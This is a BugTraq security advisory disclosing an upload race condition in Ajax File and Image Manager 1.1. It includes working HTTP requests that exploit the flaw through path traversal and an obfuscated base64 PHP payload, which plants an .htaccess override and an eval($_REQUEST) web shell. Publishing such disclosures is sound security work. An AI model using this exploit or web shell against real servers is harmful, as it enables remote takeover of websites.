BugTraq
[PT-2013-41] Arbitrary Code Execution in Ajax File and Image Manager Sep 19 2013 07:30AM
noreply ptsecurity ru
-----------------------------------------------------------
(PT-2013-41) Positive Technologies Security Advisory

Arbitrary Code Execution in Ajax File and Image Manager
-----------------------------------------------------------

---[ Vulnerable software ]

Ajax File and Image Manager
Version: 1.1 and earlier

Link:
http://www.phpletter.com/DOWNLOAD/

---[ Severity level ]

Severity level: High
Impact: Arbitrary Code Execution
Access Vector: Remote

CVSS v2:
Base Score: 10
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVE: not assigned

---[ Software description ]

Ajax file and Image Manager is an open source file manager, which employs Ajax and PHP. It can be used as a standalone web application, as well as the TinyMCE/FCKeditor plugin.

---[ Vulnerability description ]

The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager.

Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its extension is not allowed by whitelist. Thus, you can refer to the uploaded file before its removal, resulting in arbitrary code execution.

Vulnerability exploitation example:

Send the following requests simultaneously:

1)

POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/a
jax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1

Host: localhost

User-Agent: google/agent

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------307211690811

Content-Length: 613
-----------------------------307211690811

Content-Disposition: form-data; name="file"; filename="1.php"

Content-Type: image/jpeg

<?php

eval(base64_decode("JGZwID0gZm9wZW4oIi5odGFjY2VzcyIsICJ3Iik7CiRodGFjY2Vz
cyA9ICc8RmlsZXNNYXRjaCAi

LihwaHApJCI+CkFsbG93IGZyb20gYWxsCjwvRmlsZXNtYXRjaD4nOwokdGVzdCA9IGZ3cml0
ZSgk

ZnAsICRodGFjY2Vzcyk7CmZjbG9zZSgkZnApOwojaWYoZmlsZV9leGlzdHMoIjIucGhwIikp
IHtk

aWUoKTt9CiRmcDEgPSBmb3BlbigiMi5waHAiLCAidyIpOwokY29kZSA9ICc8P3BocCBldmFs
KCRf

UkVRVUVTVFtjXSk7ID8+JzsKJHRlc3QgPSBmd3JpdGUoJGZwMSwgJGNvZGUpOwpmY2xvc2Uo
JGZw

MSk7"));

?>

-----------------------------307211690811?

2)

POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/a
jax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1

Host: localhost

User-Agent: google/agent

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------307211690811

Content-Length: 240
-----------------------------307211690811

Content-Disposition: form-data; name="file"; filename=".htaccess"

Content-Type: image/jpeg

<FilesMatch ".(php)$">

Allow from all

</FilesMatch>

-----------------------------307211690811?

3)

GET /targethost/images/banner/1.php HTTP/1.1

Host: localhost

Connection: keep-alive

This will also create the following files in the /targethost/images/banner directory:
.htaccess with

<FilesMatch ".(php)$">

Allow from all

</Filesmatch>

and 2.php with <?php eval($_REQUEST[c]); ?>.

---[ How to fix ]

No solution

---[ Advisory status ]

20.06.2013 - Vendor gets vulnerability details
04.09.2013 - Vulnerability details were sent to CERT
17.09.2013 - Public disclosure

---[ Credits ]

The vulnerability was detected by Ilya Krupenko, Positive Research Center (Positive Technologies Company)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus